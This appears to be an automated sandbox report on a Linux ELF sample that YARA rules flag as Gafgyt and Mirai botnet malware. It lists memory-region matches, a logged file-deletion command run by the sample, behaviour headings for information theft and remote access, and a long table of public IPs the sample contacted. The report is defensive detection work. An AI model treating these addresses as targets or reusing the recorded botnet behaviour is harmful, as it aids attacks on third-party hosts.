Source: Process Memory Space: x86.elf PID: 6231, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6231, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6232, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6232, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6233, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6233, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6234, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6234, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6235, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6235, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6236, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6236, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6237, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6237, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6238, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: x86.elf PID: 6238, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: classification engine Classification label: mal100.spre.troj.linELF@0/0@0/0
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/memcpy.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/mempcpy.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/memset.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strcat.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strchr.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strcmp.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strcpy.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strlen.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strpbrk.S
Source: x86.elf ELF static info symbol of initial sample: libc/string/x86_64/strspn.S
Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crt1.S
Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crti.S
Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/crtn.S
Source: x86.elf ELF static info symbol of initial sample: libc/sysdeps/linux/x86_64/vfork.S
Executes the "rm" command used to delete files or directories
Source: /usr/bin/dash (PID: 6240) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.1OhBrsxyM9 /tmp/tmp.43Wb2CE3jf /tmp/tmp.RGOejBco9c Jump to behavior
Source: /usr/bin/dash (PID: 6249) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.1OhBrsxyM9 /tmp/tmp.43Wb2CE3jf /tmp/tmp.RGOejBco9c Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Gafgyt
Source: Yara match File source: x86.elf, type: SAMPLE
Source: Yara match File source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Yara detected Mirai
Source: Yara match File source: x86.elf, type: SAMPLE
Source: Yara match File source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x86.elf PID: 6226, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6227, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6229, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6231, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6233, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6234, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6235, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6236, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6237, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6238, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Gafgyt
Source: Yara match File source: x86.elf, type: SAMPLE
Source: Yara match File source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Yara detected Mirai
Source: Yara match File source: x86.elf, type: SAMPLE
Source: Yara match File source: 6233.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6235.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6231.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: x86.elf PID: 6226, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6227, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6229, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6231, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6233, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6234, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6235, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6236, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6237, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: x86.elf PID: 6238, type: MEMORYSTR

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
43.183.235.172
 unknown Japan 4249 LILLY-ASUS false
46.80.223.91
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
188.240.94.155
 unknown Romania
44605 TELECABLU-ASNRO false
188.70.113.19
 unknown Kuwait
29357 WATANIYATELECOM-ASKW true
81.46.178.236
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
85.167.43.230
 unknown Norway
2119 TELENOR-NEXTELTelenorNorgeASNO false
5.167.2.133
 unknown Russian Federation
51645 IRKUTSK-ASRU false
182.173.150.184
 unknown Japan 9614 OCTOitaCableTelecomColtdJP false
61.92.98.201
 unknown Hong Kong
9269 HKBN-AS-APHongKongBroadbandNetworkLtdHK false
118.207.50.34
 unknown China
4808 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN true
182.208.147.88
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
81.0.213.110
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ false
2.81.115.27
 unknown Portugal
3243 MEO-RESIDENCIALPT false
81.44.20.107
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
121.47.4.143
 unknown China
9811 BJGYsritcorpbeijingCN false
188.219.255.225
 unknown Italy
30722 VODAFONE-IT-ASNIT false
46.254.157.128
 unknown Italy
205716 ADLIT false
88.176.175.191
 unknown France
12322 PROXADFR false
101.232.34.4
 unknown China
17816 CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi false
61.190.33.54
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
188.161.118.17
 unknown Palestinian Territory Occupied
208473 ASN-FURRERAPS false
85.158.17.173
 unknown France
16071 GRPLEGFR false
185.174.7.13
 unknown Belgium
47630 BE-TELEVOIPBE true
85.141.57.29
 unknown Russian Federation
8359 MTSRU false
5.187.249.249
 unknown Hungary
5483 MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU false
78.244.24.171
 unknown France
12322 PROXADFR false
81.3.37.194
 unknown Germany
24679 SSERV-ASDE false
182.87.139.140
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
212.10.93.103
 unknown Denmark
197288 STOFANETDK false
188.102.24.24
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
81.134.60.63
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
81.142.13.40
 unknown United Kingdom
6871 PLUSNETUKInternetServiceProviderGB false
81.199.32.73
 unknown United Kingdom
12491 IPPLANET-ASIL false
88.123.248.18
 unknown France
12322 PROXADFR false
81.176.82.154
 unknown Russian Federation
8342 RTCOMM-ASRU false
2.25.83.191
 unknown United Kingdom
12576 EELtdGB false
212.61.229.7
 unknown Netherlands
8426 CLARANET-ASClaraNETLTDGB false
85.152.116.101
 unknown Spain
12946 TELECABLESpainES false
117.99.86.3
 unknown India
24560 AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices false
46.11.51.246
 unknown Malta
15735 DATASTREAM-NETMT false
94.202.112.131
 unknown United Arab Emirates
15802 DU-AS1AE false
81.135.78.17
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
81.183.80.202
 unknown Hungary
5483 MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU false
94.111.6.252
 unknown Belgium
47377 ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquired false
185.127.219.157
 unknown Serbia
197423 JOTEL-ASRS false
121.97.54.205
 unknown Philippines
6648 BAYAN-TELECOMMUNICATIONSBayanTelecommunicationsIncPH false
85.80.199.61
 unknown Denmark
9158 TELENOR_DANMARK_ASDK false
188.35.2.248
 unknown Russian Federation
34123 NETORN-ASRU false
218.5.106.113
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
212.31.207.33
 unknown Spain
5400 BTGB true
212.86.109.115
 unknown Ukraine
204601 ON-LINE-DATAServerlocation-NetherlandsDrontenNL false
78.1.211.178
 unknown Croatia (LOCAL Name: Hrvatska)
5391 T-HTCroatianTelecomIncHR false
61.169.172.94
 unknown China
4812 CHINANET-SH-APChinaTelecomGroupCN true
81.197.119.147
 unknown Finland
719 ELISA-ASHelsinkiFinlandEU false
218.107.217.58
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
112.72.89.32
 unknown Viet Nam
45539 VTCWLB-AS-VNVTCWLB-VN false
95.4.134.163
 unknown Turkey
9121 TTNETTR false
61.70.4.6
 unknown Taiwan; Republic of China (ROC)
9416 MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW false
190.132.146.188
 unknown Uruguay
6057 AdministracionNacionaldeTelecomunicacionesUY false
81.113.196.151
 unknown Italy
20959 TELECOM-ITALIA-DATA-COMIT false
213.7.194.149
 unknown Cyprus
6866 CYTA-NETWORKInternetServicesCY false
81.128.153.191
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
151.212.28.160
 unknown United Kingdom
11003 PANDGUS false
113.212.20.174
 unknown China
24147 CNNIC-CBDTELENET-APBEIJINGCBDTELECOMCOLTDCN false
188.42.117.203
 unknown Luxembourg
7979 SERVERS-COMUS false
5.102.163.38
 unknown Germany
199284 ENCOLINEDE false
95.10.252.117
 unknown Turkey
9121 TTNETTR false
188.85.251.83
 unknown Spain
12430 VODAFONE_ESES false
81.7.137.117
 unknown Denmark
16095 JAYNETSentiaDanmarkASDK false
218.50.211.210
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
213.82.90.73
 unknown Italy
3269 ASN-IBSNAZIT false
112.115.105.14
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
46.34.101.84
 unknown Iran (ISLAMIC Republic Of)
48608 MELLAT-ASIR false
151.134.6.122
 unknown United States
46093 PALM-BEACH-COUNTY-FLORIDAUS false
78.54.147.174
 unknown Germany
6805 TDDE-ASN1DE false
46.131.148.65
 unknown Estonia
3249 ESTPAKEE false
112.152.35.233
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
5.246.17.97
 unknown Saudi Arabia
34400 ASN-ETTIHADETISALATSA false
61.121.238.55
 unknown Japan 10011 ADVANadvanscopeincJP false
188.146.3.99
 unknown Poland
12912 TMPL false
81.154.0.151
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
188.52.45.230
 unknown Saudi Arabia
25019 SAUDINETSTC-ASSA false
5.249.63.214
 unknown Portugal
12353 VODAFONE-PTVodafonePortugalPT false
212.189.120.82
 unknown Netherlands
286 KPNNL false
218.179.151.8
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
188.207.32.129
 unknown Netherlands
1136 KPNKPNNationalEU false
188.92.111.150
 unknown Russian Federation
8595 WESTCALL-ASRU false
112.69.254.3
 unknown Japan 17511 OPTAGEOPTAGEIncJP false
188.181.9.19
 unknown Denmark
3292 TDCTDCASDK false
188.114.184.102
 unknown Denmark
43557 ASEMNETDK false
85.110.95.25
 unknown Turkey
9121 TTNETTR false
78.95.179.122
 unknown Saudi Arabia
39891 ALJAWWALSTC-ASSA false
113.17.176.112
 unknown China
134419 CHINATELECOM-GUANGXI-BEIHAI-MANBeihaiCN false
88.104.127.221
 unknown United Kingdom
9105 TISCALI-UKTalkTalkCommunicationsLimitedGB false
94.134.132.216
 unknown Germany
8881 VERSATELDE false
113.7.116.198
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
95.255.224.7
 unknown Italy
3269 ASN-IBSNAZIT false
188.241.177.35
 unknown Romania
1653 SUNETSUNETSwedishUniversityNetworkEU false
95.138.62.196
 unknown France
21351 CANALPLUSTELECOMFR false
188.43.113.99
 unknown Russian Federation
20485 TRANSTELECOMMoscowRussiaRU false